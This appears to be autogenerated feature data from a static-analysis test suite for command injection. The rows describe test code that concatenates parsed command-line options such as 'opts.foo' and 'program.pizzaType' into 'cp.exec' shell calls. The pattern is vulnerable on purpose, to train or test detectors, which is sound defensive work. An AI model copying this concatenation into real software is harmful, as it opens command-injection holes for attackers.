autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | exceptional return of parser.parse() | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | exceptional return of parser.parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | exceptional return of parser.parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:20:127:24 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:20:127:24 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:20:127:24 | parse | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:20:127:24 | parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:20:127:24 | parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:3 | cp | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:8 | cp.exec | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | exceptional return of cp.exec ... ts.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | exceptional return of cp.exec ... ts.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | exceptional return of cp.exec ... ts.foo) | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | exceptional return of cp.exec ... ts.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | exceptional return of cp.exec ... ts.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:5:129:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:5:129:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:5:129:8 | exec | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:5:129:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:5:129:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- opts.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:10:129:29 | "cmd.sh " + opts.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:25 | opts | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:25 | opts | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:25 | opts | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:25 | opts | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:25 | opts | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:22:129:29 | opts.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:27:129:29 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:27:129:29 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:27:129:29 | foo | enclosingFunctionBody | dashdash require dashdash opts dashdash parse options options cp exec cmd.sh opts foo parser dashdash createParser options options opts parser parse cp exec cmd.sh opts foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:27:129:29 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:27:129:29 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:1:138:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:1:138:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:1:138:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | cp | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | require | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | this | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:132:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | 'arguments' object of anonymous function | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | exceptional return of anonymous function | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | return of anonymous function | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:132:2:138:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:18 | { program } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:18 | { program } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:18 | { program } | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:18 | { program } | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:18 | { program } | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | program | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | { progr ... ander') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | { progr ... ander') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | { progr ... ander') | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | { progr ... ander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:8:133:41 | { progr ... ander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:10:133:16 | program | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:28 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:28 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:28 | require | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:28 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:28 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | exceptional return of require('commander') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | exceptional return of require('commander') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | exceptional return of require('commander') | enclosingFunctionBody | program require commander program version 0.0.1 cp exec cmd.sh program opts pizzaType cp exec cmd.sh program pizzaType | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | exceptional return of require('commander') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | exceptional return of require('commander') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') | contextFunctionInterfaces | | +| 